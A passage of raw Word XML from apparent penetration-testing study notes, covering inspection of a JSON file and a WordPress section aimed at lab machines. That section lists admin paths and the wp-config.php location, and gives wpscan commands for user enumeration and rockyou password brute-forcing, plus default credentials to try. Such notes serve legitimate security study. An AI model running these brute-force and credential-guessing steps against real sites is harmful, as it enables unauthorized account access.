        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Upon checking the type of file, we find that it is JSON text</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CE9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="906"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">file 994d3f3a-23e7-4892-9bfc-01fac9bbd3b9</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CEA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="906"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">994d3f3a-23e7-4892-9bfc-01fac9bbd3b9: JSON text data</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CEB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="906"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We can now use the cat command to view the contents of the downloaded file and pipe the output through jq to format the JSON data neatly</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CEC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="906"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cat 994d3f3a-23e7-4892-9bfc-01fac9bbd3b9 |jq</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CED">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CEE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002C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CF0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CF1">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_4ooqp43mms9n" w:id="392"/>
      <w:bookmarkEnd w:id="392"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">WordPress</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CF2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_kteqs9l319o9" w:id="393"/>
      <w:bookmarkEnd w:id="393"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">General</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CF3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CF4">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Useful pages:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CF5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1341"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/wp-admin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1341"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/wp-login.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CF7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1341"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It's a login page</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CF8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1341"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> /var/www/html/wp-config.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CF9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1341"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Look at the "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to privilege escalate in Wordpress after getting terminal</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CFA">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CFB">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to find pages within themes:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CFC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="325"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">General format</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CFD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="325"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">http://$IP/WP-Root-Install/themes/theme-year-name/nameOfFile.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CFE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="325"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Example (theme was</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> twenter-twenty</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and the page was </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">404.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002CFF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="325"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">http://192.168.208.55/themes/twentytwenty/404.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D00">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="325"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You may notice the "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">WP-Root-Install</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" is not here, since that's because the wordpress root install is just the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">http://192.168.208.55</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. If you found the wordpress site in like the directory /shenzi, then it would look like:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D01">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="325"/>
        </w:numPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">http://192.168.208.55/shenzi/themes/twentytwenty/404.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D02">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_9qh4bsultrk" w:id="394"/>
      <w:bookmarkEnd w:id="394"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D03">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_y5sipy9l29bw" w:id="395"/>
      <w:bookmarkEnd w:id="395"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Using WPScan in general to enumerate and find usernames</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D04">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D05">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">IMPORTANT: Try default credentials like </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">admin:admin</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">root:root</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D06">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D07">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From </w:t>
      </w:r>
      <w:hyperlink r:id="rId948">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:b w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">ColdBoxEasy</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(PG Play) (</w:t>
      </w:r>
      <w:hyperlink r:id="rId949">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:b w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://medium.com/@abinus2021/coldbox-easy-walkthrough-d6e78e6a455</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D08">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D09">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">wpscan --url http://192.168.43.43/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D0A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Basic scan of the WordPress site</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D0B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D0C">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">wpscan --url http://192.168.120.50 -t 40 -e u1-1000 --passwords /usr/share/wordlists/rockyou.txt --force</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D0D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1083"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This one bruteforces usernames (user ID from 1 to 1000) and the rockyou list</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D0E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1083"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-t 40</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> : Sets the number of threads to use (40 in this case). Higher threads speed up the scan but may overload the server or trigger detection.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D0F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1083"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--force</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> : Bypasses any warnings or prompts WPScan might display</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D10">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D11">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D12">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">wpscan –url http://192.168.43.43/ --enumerate u</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002D13">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="269"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
